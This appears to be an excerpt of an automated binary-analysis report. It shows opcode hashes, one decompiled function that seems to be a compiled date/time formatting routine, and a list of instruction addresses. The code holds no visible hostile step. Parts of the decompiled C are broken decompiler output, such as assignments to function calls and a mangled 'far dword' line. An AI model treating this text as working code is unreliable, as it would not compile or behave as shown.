                                                                                                                                                  • Instruction ID: 8097af22c7a509eb2429e14b9a2a0615beb49dadf3fe05f52f9a2fe1579c3aba
                                                                                                                                                  • Opcode Fuzzy Hash: 9362f7df9ff455d83417263436656e1e02680dce908f7494a7909927b6157796
                                                                                                                                                  • Instruction Fuzzy Hash: AAD05E71201B168ADB516BB3A8C5B4731889320B44F10487FA110762D1CAFC4C105A4D
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 80%
                                                                                                                                                  			E0040B8CD(void* __ecx, void* __edx) {
                                                                                                                                                  				signed short _t159;
                                                                                                                                                  				signed short _t161;
                                                                                                                                                  				signed short _t163;
                                                                                                                                                  				signed short _t165;
                                                                                                                                                  				signed int _t174;
                                                                                                                                                  				void* _t176;
                                                                                                                                                  				intOrPtr _t217;
                                                                                                                                                  				intOrPtr _t220;
                                                                                                                                                  				signed int _t225;
                                                                                                                                                  				void* _t243;
                                                                                                                                                  				void* _t245;
                                                                                                                                                  				intOrPtr _t265;
                                                                                                                                                  				signed short _t273;
                                                                                                                                                  				void* _t274;
                                                                                                                                                  
                                                                                                                                                  				L0:
                                                                                                                                                  				while(1) {
                                                                                                                                                  					L0:
                                                                                                                                                  					E0040B144(_t274);
                                                                                                                                                  					_t273 =  *((intOrPtr*)(_t274 - 4)) - 1;
                                                                                                                                                  					if(E00409F2C(_t273, 5, 0x40bb84) != 0) {
                                                                                                                                                  						_t159 = E00409F2C(_t273, 3, 0x40bb8c);
                                                                                                                                                  						__eflags = _t159;
                                                                                                                                                  						if(_t159 != 0) {
                                                                                                                                                  							_t161 = E00409F2C(_t273, 4, 0x40bb90);
                                                                                                                                                  							__eflags = _t161;
                                                                                                                                                  							if(_t161 != 0) {
                                                                                                                                                  								_t163 = E00409F2C(_t273, 4, 0x40bb98);
                                                                                                                                                  								__eflags = _t163;
                                                                                                                                                  								if(_t163 != 0) {
                                                                                                                                                  									_t165 = E00409F2C(_t273, 3, 0x40bba0);
                                                                                                                                                  									__eflags = _t165;
                                                                                                                                                  									if(_t165 != 0) {
                                                                                                                                                  										E0040B030(1,  *((intOrPtr*)(_t274 + 8)));
                                                                                                                                                  									} else {
                                                                                                                                                  										E0040B10C(_t274);
                                                                                                                                                  										_pop(_t243);
                                                                                                                                                  										E0040B074( *((intOrPtr*)(0x41998c + (E0040AFF4(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t243,  *((intOrPtr*)(_t274 + 8)));
                                                                                                                                                  										 *((intOrPtr*)(_t274 - 4)) =  *((intOrPtr*)(_t274 - 4)) + 2;
                                                                                                                                                  									}
                                                                                                                                                  								} else {
                                                                                                                                                  									E0040B10C(_t274);
                                                                                                                                                  									_pop(_t245);
                                                                                                                                                  									E0040B074( *((intOrPtr*)(0x4199a8 + (E0040AFF4(__eflags,  *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) + 8)),  *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) + 0xc))) & 0x0000ffff) * 4)), _t245,  *((intOrPtr*)(_t274 + 8)));
                                                                                                                                                  									 *((intOrPtr*)(_t274 - 4)) =  *((intOrPtr*)(_t274 - 4)) + 3;
                                                                                                                                                  								}
                                                                                                                                                  							} else {
                                                                                                                                                  								__eflags =  *((short*)(_t274 - 0x16)) - 0xc;
                                                                                                                                                  								if( *((short*)(_t274 - 0x16)) >= 0xc) {
                                                                                                                                                  									_t217 =  *0x419924; // 0x21707ec
                                                                                                                                                  									E0040B074(_t217, 4,  *((intOrPtr*)(_t274 + 8)));
                                                                                                                                                  								} else {
                                                                                                                                                  									_t220 =  *0x419920; // 0x21707dc
                                                                                                                                                  									E0040B074(_t220, 4,  *((intOrPtr*)(_t274 + 8)));
                                                                                                                                                  								}
                                                                                                                                                  								 *((intOrPtr*)(_t274 - 4)) =  *((intOrPtr*)(_t274 - 4)) + 3;
                                                                                                                                                  								 *((char*)(_t274 - 0x1e)) = 1;
                                                                                                                                                  							}
                                                                                                                                                  						} else {
                                                                                                                                                  							__eflags =  *((short*)(_t274 - 0x16)) - 0xc;
                                                                                                                                                  							if( *((short*)(_t274 - 0x16)) >= 0xc) {
                                                                                                                                                  								__eflags = _t273;
                                                                                                                                                  							}
                                                                                                                                                  							E0040B030(1,  *((intOrPtr*)(_t274 + 8)));
                                                                                                                                                  							 *((intOrPtr*)(_t274 - 4)) =  *((intOrPtr*)(_t274 - 4)) + 2;
                                                                                                                                                  							 *((char*)(_t274 - 0x1e)) = 1;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						__eflags =  *((short*)(__ebp - 0x16)) - 0xc;
                                                                                                                                                  						if( *((short*)(__ebp - 0x16)) >= 0xc) {
                                                                                                                                                  							__esi = __esi + 3;
                                                                                                                                                  							__eflags = __esi;
                                                                                                                                                  						}
                                                                                                                                                  						__eax =  *(__ebp + 8);
                                                                                                                                                  						__edx = 2;
                                                                                                                                                  						__eax = __esi;
                                                                                                                                                  						__eax = E0040B030(2,  *(__ebp + 8));
                                                                                                                                                  						 *(__ebp - 4) =  *(__ebp - 4) + 4;
                                                                                                                                                  						 *((char*)(__ebp - 0x1e)) = 1;
                                                                                                                                                  					}
                                                                                                                                                  					while(1) {
                                                                                                                                                  						L108:
                                                                                                                                                  						_t157 =  *((intOrPtr*)( *((intOrPtr*)(_t274 - 4))));
                                                                                                                                                  						if(_t157 == 0) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						L1:
                                                                                                                                                  						 *(_t274 - 5) = _t157;
                                                                                                                                                  						asm("bt [0x418250], eax");
                                                                                                                                                  						if(( *(_t274 - 5) & 0x000000ff) >= 0) {
                                                                                                                                                  							 *((intOrPtr*)(_t274 - 4)) = E0040D7B0( *((intOrPtr*)(_t274 - 4)));
                                                                                                                                                  							_t174 =  *(_t274 - 5);
                                                                                                                                                  							__eflags = _t174 + 0x9f - 0x1a;
                                                                                                                                                  							if(_t174 + 0x9f - 0x1a < 0) {
                                                                                                                                                  								_t174 = _t174 - 0x20;
                                                                                                                                                  								__eflags = _t174;
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t174 + 0xbf - 0x1a;
                                                                                                                                                  							if(_t174 + 0xbf - 0x1a < 0) {
                                                                                                                                                  								__eflags = _t174 - 0x4d;
                                                                                                                                                  								if(_t174 == 0x4d) {
                                                                                                                                                  									__eflags = _t225 - 0x48;
                                                                                                                                                  									if(_t225 == 0x48) {
                                                                                                                                                  										_t174 = 0x4e;
                                                                                                                                                  									}
                                                                                                                                                  								}
                                                                                                                                                  								_t225 = _t174;
                                                                                                                                                  							}
                                                                                                                                                  							L10:
                                                                                                                                                  							_t176 = (_t174 & 0x000000ff) + 0xffffffde;
                                                                                                                                                  							__eflags = _t176 - 0x38;
                                                                                                                                                  							if(_t176 > 0x38) {
                                                                                                                                                  								L107:
                                                                                                                                                  								E0040B030(1,  *((intOrPtr*)(_t274 + 8)));
                                                                                                                                                  								continue;
                                                                                                                                                  							}
                                                                                                                                                  							L11:
                                                                                                                                                  							switch( *((intOrPtr*)( *(_t176 + 0x40b4d7) * 4 +  &M0040B510))) {
                                                                                                                                                  								case 0:
                                                                                                                                                  									goto L107;
                                                                                                                                                  								case 1:
                                                                                                                                                  									L12:
                                                                                                                                                  									E0040B0E0(_t274);
                                                                                                                                                  									E0040B10C(_t274);
                                                                                                                                                  									__eflags =  *((intOrPtr*)(_t274 - 0xc)) - 2;
                                                                                                                                                  									if( *((intOrPtr*)(_t274 - 0xc)) > 2) {
                                                                                                                                                  										E0040B094( *(_t274 - 0xe) & 0x0000ffff, 4, _t280,  *((intOrPtr*)(_t274 + 8)));
                                                                                                                                                  									} else {
                                                                                                                                                  										E0040B094(( *(_t274 - 0xe) & 0x0000ffff) % 0x64, 2, _t280,  *((intOrPtr*)(_t274 + 8)));
                                                                                                                                                  									}
                                                                                                                                                  									goto L108;
                                                                                                                                                  								case 2:
                                                                                                                                                  									L15:
                                                                                                                                                  									E0040B0E0(__ebp) = E0040B10C(__ebp);
                                                                                                                                                  									__eax =  *(__ebp + 8);
                                                                                                                                                  									__edx = __ebp - 0x24;
                                                                                                                                                  									 *(__ebp - 0xc) = E0040B184( *(__ebp - 0xc), __ebx, __ebp - 0x24, __esi, __ebp);
                                                                                                                                                  									__eax =  *(__ebp - 0x24);
                                                                                                                                                  									__eax = E0040B074( *(__ebp - 0x24), __ecx,  *(__ebp + 8));
                                                                                                                                                  									goto L108;
                                                                                                                                                  								case 3:
                                                                                                                                                  									L16:
                                                                                                                                                  									E0040B0E0(__ebp) = E0040B10C(__ebp);
                                                                                                                                                  									__eax =  *(__ebp + 8);
                                                                                                                                                  									__edx = __ebp - 0x28;
                                                                                                                                                  									 *(__ebp - 0xc) = E0040B2EC( *(__ebp - 0xc), __ebx, __ebp - 0x28, __esi, __ebp);
                                                                                                                                                  									__eax =  *(__ebp - 0x28);
                                                                                                                                                  									__eax = E0040B074( *(__ebp - 0x28), __ecx,  *(__ebp + 8));
                                                                                                                                                  									goto L108;
                                                                                                                                                  								case 4:
                                                                                                                                                  									L17:
                                                                                                                                                  									E0040B0E0(__ebp) = E0040B10C(__ebp);
                                                                                                                                                  									 *(__ebp - 0xc) =  *(__ebp - 0xc) - 1;
                                                                                                                                                  									__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
                                                                                                                                                  									__eflags =  *(__ebp - 0xc) - 0xffffffffffffffff;
                                                                                                                                                  									if(__eflags < 0) {
                                                                                                                                                  										__eax =  *(__ebp + 8);
                                                                                                                                                  										__eax =  *(__ebp - 0x10) & 0x0000ffff;
                                                                                                                                                  										__edx =  *(__ebp - 0xc);
                                                                                                                                                  										__eax = E0040B094( *(__ebp - 0x10) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                                                                                                                                                  									} else {
                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                  											 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
                                                                                                                                                  											__eax = 0x41992c[ *(__ebp - 0x10) & 0x0000ffff];
                                                                                                                                                  											__eax = E0040B074(0x41992c[ *(__ebp - 0x10) & 0x0000ffff], __ecx,  *(__ebp + 8));
                                                                                                                                                  										} else {
                                                                                                                                                  											 *(__ebp + 8) =  *(__ebp - 0x10) & 0x0000ffff;
                                                                                                                                                  											__eax =  *(0x41995c + ( *(__ebp - 0x10) & 0x0000ffff) * 4);
                                                                                                                                                  											__eax = E0040B074( *(0x41995c + ( *(__ebp - 0x10) & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L108;
                                                                                                                                                  								case 5:
                                                                                                                                                  									L23:
                                                                                                                                                  									E0040B0E0(__ebp) =  *(__ebp - 0xc);
                                                                                                                                                  									__eax =  *(__ebp - 0xc) - 1;
                                                                                                                                                  									__eax =  *(__ebp - 0xc) - 0xffffffffffffffff;
                                                                                                                                                  									__eflags = __eax;
                                                                                                                                                  									if(__eflags < 0) {
                                                                                                                                                  										E0040B10C(__ebp) =  *(__ebp + 8);
                                                                                                                                                  										__eax =  *(__ebp - 0x12) & 0x0000ffff;
                                                                                                                                                  										__edx =  *(__ebp - 0xc);
                                                                                                                                                  										__eax = E0040B094( *(__ebp - 0x12) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                                                                                                                                                  									} else {
                                                                                                                                                  										if(__eflags == 0) {
                                                                                                                                                  											E0040AFF4(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
                                                                                                                                                  											__eax =  *(0x41998c + (__ax & 0x0000ffff) * 4);
                                                                                                                                                  											__eax = E0040B074( *(0x41998c + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
                                                                                                                                                  										} else {
                                                                                                                                                  											__eax = __eax - 1;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											if(__eflags == 0) {
                                                                                                                                                  												E0040AFF4(__eflags,  *((intOrPtr*)( *(__ebp + 8) + 8)),  *((intOrPtr*)( *(__ebp + 8) + 0xc))) = __ax & 0x0000ffff;
                                                                                                                                                  												__eax =  *(0x4199a8 + (__ax & 0x0000ffff) * 4);
                                                                                                                                                  												__eax = E0040B074( *(0x4199a8 + (__ax & 0x0000ffff) * 4), __ecx,  *(__ebp + 8));
                                                                                                                                                  											} else {
                                                                                                                                                  												__eax = __eax - 1;
                                                                                                                                                  												__eflags = __eax;
                                                                                                                                                  												if(__eax == 0) {
                                                                                                                                                  													__eax =  *(__ebp + 8);
                                                                                                                                                  													__eax =  *0x419914; // 0x21707a4
                                                                                                                                                  													__eax = E0040B3F4(__eax, __ebx, __esi,  *(__ebp + 8));
                                                                                                                                                  												} else {
                                                                                                                                                  													__eax =  *(__ebp + 8);
                                                                                                                                                  													__eax =  *0x419918; // 0x21707bc
                                                                                                                                                  													__eax = E0040B3F4(__eax, __ebx, __esi,  *(__ebp + 8));
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									goto L108;
                                                                                                                                                  								case 6:
                                                                                                                                                  									L33:
                                                                                                                                                  									__eax = E0040B0E0(__ebp);
                                                                                                                                                  									__eax = E0040B144(__ebp);
                                                                                                                                                  									 *(__ebp - 0x1f) = 0;
                                                                                                                                                  									__esi =  *(__ebp - 4);
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L52:
                                                                                                                                                  										__al =  *__esi;
                                                                                                                                                  										__eflags = __al;
                                                                                                                                                  										if(__al == 0) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										L34:
                                                                                                                                                  										__eax = __eax & 0x000000ff;
                                                                                                                                                  										__eflags = __eax;
                                                                                                                                                  										asm("bt [0x418250], eax");
                                                                                                                                                  										if(__eax >= 0) {
                                                                                                                                                  											L36:
                                                                                                                                                  											__eax = 0;
                                                                                                                                                  											__al =  *__esi;
                                                                                                                                                  											__eflags = 0 - 0x48;
                                                                                                                                                  											if(0 > 0x48) {
                                                                                                                                                  												L42:
                                                                                                                                                  												__eax = 0xffffffffffffff9f;
                                                                                                                                                  												__eflags = 0xffffffffffffff9f;
                                                                                                                                                  												if(0xffffffffffffff9f == 0) {
                                                                                                                                                  													L45:
                                                                                                                                                  													__eflags =  *(__ebp - 0x1f);
                                                                                                                                                  													if( *(__ebp - 0x1f) != 0) {
                                                                                                                                                  														L51:
                                                                                                                                                  														__esi = __esi + 1;
                                                                                                                                                  														__eflags = __esi;
                                                                                                                                                  														continue;
                                                                                                                                                  													}
                                                                                                                                                  													L46:
                                                                                                                                                  													__edx = 0x40bb84;
                                                                                                                                                  													__ecx = 5;
                                                                                                                                                  													__eax = __esi;
                                                                                                                                                  													__eax = E00409F2C(__esi, 5, 0x40bb84);
                                                                                                                                                  													__eflags = __eax;
                                                                                                                                                  													if(__eax == 0) {
                                                                                                                                                  														L49:
                                                                                                                                                  														 *((char*)(__ebp - 0x1e)) = 1;
                                                                                                                                                  														break;
                                                                                                                                                  													}
                                                                                                                                                  													L47:
                                                                                                                                                  													__edx = 0x40bb8c;
                                                                                                                                                  													__ecx = 3;
                                                                                                                                                  													__eax = __esi;
                                                                                                                                                  													__eax = E00409F2C(__esi, 3, 0x40bb8c);
                                                                                                                                                  													__eflags = __eax;
                                                                                                                                                  													if(__eax == 0) {
                                                                                                                                                  														goto L49;
                                                                                                                                                  													}
                                                                                                                                                  													L48:
                                                                                                                                                  													__edx = 0x40bb90;
                                                                                                                                                  													__ecx = 4;
                                                                                                                                                  													__eax = __esi;
                                                                                                                                                  													__eax = E00409F2C(__esi, 4, 0x40bb90);
                                                                                                                                                  													__eflags = __eax;
                                                                                                                                                  													if(__eax != 0) {
                                                                                                                                                  														break;
                                                                                                                                                  													}
                                                                                                                                                  													goto L49;
                                                                                                                                                  												}
                                                                                                                                                  												L43:
                                                                                                                                                  												__eax = 0xffffffffffffff98;
                                                                                                                                                  												__eflags = 0xffffffffffffff9f;
                                                                                                                                                  												if(0xffffffffffffff9f == 0) {
                                                                                                                                                  													break;
                                                                                                                                                  												}
                                                                                                                                                  												L44:
                                                                                                                                                  												goto L51;
                                                                                                                                                  											}
                                                                                                                                                  											L37:
                                                                                                                                                  											if(0 == 0x48) {
                                                                                                                                                  												break;
                                                                                                                                                  											}
                                                                                                                                                  											L38:
                                                                                                                                                  											__eax = 0xffffffffffffffde;
                                                                                                                                                  											__eflags = 0xffffffffffffffde;
                                                                                                                                                  											if(0xffffffffffffffde == 0) {
                                                                                                                                                  												L50:
                                                                                                                                                  												__al =  *(__ebp - 0x1f);
                                                                                                                                                  												__al =  *(__ebp - 0x1f) ^ 0x00000001;
                                                                                                                                                  												__eflags = __al;
                                                                                                                                                  												 *(__ebp - 0x1f) = __al;
                                                                                                                                                  												goto L51;
                                                                                                                                                  											}
                                                                                                                                                  											L39:
                                                                                                                                                  											__eax = 0xffffffffffffffd9;
                                                                                                                                                  											__eflags = 0xffffffffffffffde;
                                                                                                                                                  											if(0xffffffffffffffde == 0) {
                                                                                                                                                  												goto L50;
                                                                                                                                                  											}
                                                                                                                                                  											L40:
                                                                                                                                                  											__eax = 0xffffffffffffffbf;
                                                                                                                                                  											__eflags = 0xffffffffffffffde;
                                                                                                                                                  											if(0xffffffffffffffde == 0) {
                                                                                                                                                  												goto L45;
                                                                                                                                                  											}
                                                                                                                                                  											L41:
                                                                                                                                                  											goto L51;
                                                                                                                                                  										}
                                                                                                                                                  										L35:
                                                                                                                                                  										__eax = __esi;
                                                                                                                                                  										__eax = E0040D7B0(__esi);
                                                                                                                                                  										__esi = __eax;
                                                                                                                                                  									}
                                                                                                                                                  									L53:
                                                                                                                                                  									__ax =  *((intOrPtr*)(__ebp - 0x16));
                                                                                                                                                  									__eflags =  *((char*)(__ebp - 0x1e));
                                                                                                                                                  									if( *((char*)(__ebp - 0x1e)) != 0) {
                                                                                                                                                  										__eflags = __ax;
                                                                                                                                                  										if(__ax != 0) {
                                                                                                                                                  											__eflags = __ax - 0xc;
                                                                                                                                                  											if(__ax > 0xc) {
                                                                                                                                                  												__ax = __ax - 0xc;
                                                                                                                                                  												__eflags = __ax;
                                                                                                                                                  											}
                                                                                                                                                  										} else {
                                                                                                                                                  											__ax = 0xc;
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									__eflags =  *(__ebp - 0xc) - 2;
                                                                                                                                                  									if( *(__ebp - 0xc) > 2) {
                                                                                                                                                  										 *(__ebp - 0xc) = 2;
                                                                                                                                                  									}
                                                                                                                                                  									__edx =  *(__ebp + 8);
                                                                                                                                                  									__eax = __ax & 0x0000ffff;
                                                                                                                                                  									__edx =  *(__ebp - 0xc);
                                                                                                                                                  									__eax = E0040B094(__ax & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                                                                                                                                                  									goto L108;
                                                                                                                                                  								case 7:
                                                                                                                                                  									L61:
                                                                                                                                                  									E0040B0E0(__ebp) = E0040B144(__ebp);
                                                                                                                                                  									__eflags =  *(__ebp - 0xc) - 2;
                                                                                                                                                  									if( *(__ebp - 0xc) > 2) {
                                                                                                                                                  										 *(__ebp - 0xc) = 2;
                                                                                                                                                  									}
                                                                                                                                                  									__eax =  *(__ebp + 8);
                                                                                                                                                  									__eax =  *(__ebp - 0x18) & 0x0000ffff;
                                                                                                                                                  									__edx =  *(__ebp - 0xc);
                                                                                                                                                  									__eax = E0040B094( *(__ebp - 0x18) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                                                                                                                                                  									goto L108;
                                                                                                                                                  								case 8:
                                                                                                                                                  									L64:
                                                                                                                                                  									E0040B0E0(__ebp) = E0040B144(__ebp);
                                                                                                                                                  									__eflags =  *(__ebp - 0xc) - 2;
                                                                                                                                                  									if( *(__ebp - 0xc) > 2) {
                                                                                                                                                  										 *(__ebp - 0xc) = 2;
                                                                                                                                                  									}
                                                                                                                                                  									__eax =  *(__ebp + 8);
                                                                                                                                                  									__eax =  *(__ebp - 0x1a) & 0x0000ffff;
                                                                                                                                                  									__edx =  *(__ebp - 0xc);
                                                                                                                                                  									__eax = E0040B094( *(__ebp - 0x1a) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                                                                                                                                                  									goto L108;
                                                                                                                                                  								case 9:
                                                                                                                                                  									L67:
                                                                                                                                                  									__eax = E0040B0E0(__ebp);
                                                                                                                                                  									__eflags =  *(__ebp - 0xc) - 1;
                                                                                                                                                  									if( *(__ebp - 0xc) != 1) {
                                                                                                                                                  										__eax =  *(__ebp + 8);
                                                                                                                                                  										__eax =  *0x41992c; // 0x2170844
                                                                                                                                                  										__eax = E0040B3F4(__eax, __ebx, __esi,  *(__ebp + 8));
                                                                                                                                                  									} else {
                                                                                                                                                  										__eax =  *(__ebp + 8);
                                                                                                                                                  										__eax =  *0x419928; // 0x217082c
                                                                                                                                                  										__eax = E0040B3F4(__eax, __ebx, __esi,  *(__ebp + 8));
                                                                                                                                                  									}
                                                                                                                                                  									goto L108;
                                                                                                                                                  								case 0xa:
                                                                                                                                                  									L70:
                                                                                                                                                  									E0040B0E0(__ebp) = E0040B144(__ebp);
                                                                                                                                                  									__eflags =  *(__ebp - 0xc) - 3;
                                                                                                                                                  									if( *(__ebp - 0xc) > 3) {
                                                                                                                                                  										 *(__ebp - 0xc) = 3;
                                                                                                                                                  									}
                                                                                                                                                  									__eax =  *(__ebp + 8);
                                                                                                                                                  									__eax =  *(__ebp - 0x1c) & 0x0000ffff;
                                                                                                                                                  									__edx =  *(__ebp - 0xc);
                                                                                                                                                  									__eax = E0040B094( *(__ebp - 0x1c) & 0x0000ffff, __edx, __fp0,  *(__ebp + 8));
                                                                                                                                                  									goto L108;
                                                                                                                                                  								case 0xb:
                                                                                                                                                  									goto L0;
                                                                                                                                                  								case 0xc:
                                                                                                                                                  									L90:
                                                                                                                                                  									E0040B0E0(__ebp) =  *(__ebp + 8);
                                                                                                                                                  									__eax =  *0x419914; // 0x21707a4
                                                                                                                                                  									__eax = E0040B3F4(__eax, __ebx, __esi,  *(__ebp + 8));
                                                                                                                                                  									__eax = E0040B144(__ebp);
                                                                                                                                                  									__eflags =  *((short*)(__ebp - 0x16));
                                                                                                                                                  									if( *((short*)(__ebp - 0x16)) != 0) {
                                                                                                                                                  										L93:
                                                                                                                                                  										 *(__ebp + 8) = 0x40bba4;
                                                                                                                                                  										__edx = 1;
                                                                                                                                                  										E0040B030(1,  *(__ebp + 8)) =  *(__ebp + 8);
                                                                                                                                                  										__eax =  *0x41992c; // 0x2170844
                                                                                                                                                  										__eax = E0040B3F4(__eax, __ebx, __esi,  *(__ebp + 8));
                                                                                                                                                  										goto L108;
                                                                                                                                                  									}
                                                                                                                                                  									L91:
                                                                                                                                                  									__eflags =  *(__ebp - 0x18);
                                                                                                                                                  									if( *(__ebp - 0x18) != 0) {
                                                                                                                                                  										goto L93;
                                                                                                                                                  									}
                                                                                                                                                  									L92:
                                                                                                                                                  									__eflags =  *(__ebp - 0x1a);
                                                                                                                                                  									if( *(__ebp - 0x1a) == 0) {
                                                                                                                                                  										goto L108;
                                                                                                                                                  									}
                                                                                                                                                  									goto L93;
                                                                                                                                                  								case 0xd:
                                                                                                                                                  									L94:
                                                                                                                                                  									__eflags =  *0x419911;
                                                                                                                                                  									if( *0x419911 != 0) {
                                                                                                                                                  										 *(__ebp + 8) = 0x419911;
                                                                                                                                                  										__edx = 1;
                                                                                                                                                  										__eax = E0040B030(1,  *(__ebp + 8));
                                                                                                                                                  										[far dword [ecx-0x17]();
                                                                                                                                                  										 *__eax =  *__eax;
                                                                                                                                                  										_t133 = __eax + 0x41991c3d;
                                                                                                                                                  										 *_t133 =  *(__eax + 0x41991c3d) + __al;
                                                                                                                                                  										__eflags =  *_t133;
                                                                                                                                                  									}
                                                                                                                                                  									goto L108;
                                                                                                                                                  								case 0xe:
                                                                                                                                                  									L97:
                                                                                                                                                  									__eflags =  *0x41991c;
                                                                                                                                                  									if( *0x41991c != 0) {
                                                                                                                                                  										 *(__ebp + 8) = 0x41991c;
                                                                                                                                                  										__edx = 1;
                                                                                                                                                  										__eax = E0040B030(1,  *(__ebp + 8));
                                                                                                                                                  									}
                                                                                                                                                  									goto L108;
                                                                                                                                                  								case 0xf:
                                                                                                                                                  									L99:
                                                                                                                                                  									__esi =  *(__ebp - 4);
                                                                                                                                                  									while(1) {
                                                                                                                                                  										L103:
                                                                                                                                                  										__eax =  *(__ebp - 4);
                                                                                                                                                  										__al =  *__eax;
                                                                                                                                                  										__eflags = __al;
                                                                                                                                                  										if(__al == 0) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										L104:
                                                                                                                                                  										__eflags = __al -  *((intOrPtr*)(__ebp - 5));
                                                                                                                                                  										if(__al !=  *((intOrPtr*)(__ebp - 5))) {
                                                                                                                                                  											L100:
                                                                                                                                                  											__eax = __eax & 0x000000ff;
                                                                                                                                                  											__eflags = __eax;
                                                                                                                                                  											asm("bt [0x418250], eax");
                                                                                                                                                  											if(__eax >= 0) {
                                                                                                                                                  												_t139 = __ebp - 4;
                                                                                                                                                  												 *_t139 =  *(__ebp - 4) + 1;
                                                                                                                                                  												__eflags =  *_t139;
                                                                                                                                                  											} else {
                                                                                                                                                  												__eax =  *(__ebp - 4);
                                                                                                                                                  												 *(__ebp - 4) = E0040D7B0( *(__ebp - 4));
                                                                                                                                                  											}
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									L105:
                                                                                                                                                  									__eax =  *(__ebp + 8);
                                                                                                                                                  									__edx =  *(__ebp - 4);
                                                                                                                                                  									__edx =  *(__ebp - 4) - __esi;
                                                                                                                                                  									__esi = E0040B030(__edx,  *(__ebp + 8));
                                                                                                                                                  									__eax =  *(__ebp - 4);
                                                                                                                                                  									__eflags =  *__eax;
                                                                                                                                                  									if( *__eax != 0) {
                                                                                                                                                  										 *(__ebp - 4) =  *(__ebp - 4) + 1;
                                                                                                                                                  									}
                                                                                                                                                  									goto L108;
                                                                                                                                                  							}
                                                                                                                                                  						} else {
                                                                                                                                                  							E0040B030(E0040D790( *((intOrPtr*)(_t274 - 4))),  *((intOrPtr*)(_t274 + 8)));
                                                                                                                                                  							 *((intOrPtr*)(_t274 - 4)) = E0040D7B0( *((intOrPtr*)(_t274 - 4)));
                                                                                                                                                  							_t225 = 0x20;
                                                                                                                                                  							continue;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  					L109:
                                                                                                                                                  					 *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) - 0x108)) =  *((intOrPtr*)( *((intOrPtr*)(_t274 + 8)) - 0x108)) - 1;
                                                                                                                                                  					_pop(_t265);
                                                                                                                                                  					 *[fs:eax] = _t265;
                                                                                                                                                  					_push(E0040BB7C);
                                                                                                                                                  					return E004039D0(_t274 - 0x28, 2);
                                                                                                                                                  				}
                                                                                                                                                  			}

















                                                                                                                                                  0x0040b8cd
                                                                                                                                                  0x0040b8cd
                                                                                                                                                  0x0040b8cd
                                                                                                                                                  0x0040b8ce
                                                                                                                                                  0x0040b8d7
                                                                                                                                                  0x0040b8eb
                                                                                                                                                  0x0040b921
                                                                                                                                                  0x0040b926
                                                                                                                                                  0x0040b928
                                                                                                                                                  0x0040b95e
                                                                                                                                                  0x0040b963
                                                                                                                                                  0x0040b965
                                                                                                                                                  0x0040b9a7
                                                                                                                                                  0x0040b9ac
                                                                                                                                                  0x0040b9ae
                                                                                                                                                  0x0040b9ee
                                                                                                                                                  0x0040b9f3
                                                                                                                                                  0x0040b9f5
                                                                                                                                                  0x0040ba35
                                                                                                                                                  0x0040b9f7
                                                                                                                                                  0x0040b9f8
                                                                                                                                                  0x0040b9fd
                                                                                                                                                  0x0040ba1a
                                                                                                                                                  0x0040ba20
                                                                                                                                                  0x0040ba20
                                                                                                                                                  0x0040b9b0
                                                                                                                                                  0x0040b9b1
                                                                                                                                                  0x0040b9b6
                                                                                                                                                  0x0040b9d3
                                                                                                                                                  0x0040b9d9
                                                                                                                                                  0x0040b9d9
                                                                                                                                                  0x0040b967
                                                                                                                                                  0x0040b967
                                                                                                                                                  0x0040b96c
                                                                                                                                                  0x0040b983
                                                                                                                                                  0x0040b988
                                                                                                                                                  0x0040b96e
                                                                                                                                                  0x0040b972
                                                                                                                                                  0x0040b977
                                                                                                                                                  0x0040b97c
                                                                                                                                                  0x0040b98e
                                                                                                                                                  0x0040b992
                                                                                                                                                  0x0040b992
                                                                                                                                                  0x0040b92a
                                                                                                                                                  0x0040b92a
                                                                                                                                                  0x0040b92f
                                                                                                                                                  0x0040b931
                                                                                                                                                  0x0040b931
                                                                                                                                                  0x0040b93f
                                                                                                                                                  0x0040b945
                                                                                                                                                  0x0040b949
                                                                                                                                                  0x0040b949
                                                                                                                                                  0x0040b8ed
                                                                                                                                                  0x0040b8ed
                                                                                                                                                  0x0040b8f2
                                                                                                                                                  0x0040b8f4
                                                                                                                                                  0x0040b8f4
                                                                                                                                                  0x0040b8f4
                                                                                                                                                  0x0040b8f7
                                                                                                                                                  0x0040b8fb
                                                                                                                                                  0x0040b900
                                                                                                                                                  0x0040b902
                                                                                                                                                  0x0040b908
                                                                                                                                                  0x0040b90c
                                                                                                                                                  0x0040b90c
                                                                                                                                                  0x0040bb44
                                                                                                                                                  0x0040bb44
                                                                                                                                                  0x0040bb47
                                                                                                                                                  0x0040bb4b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
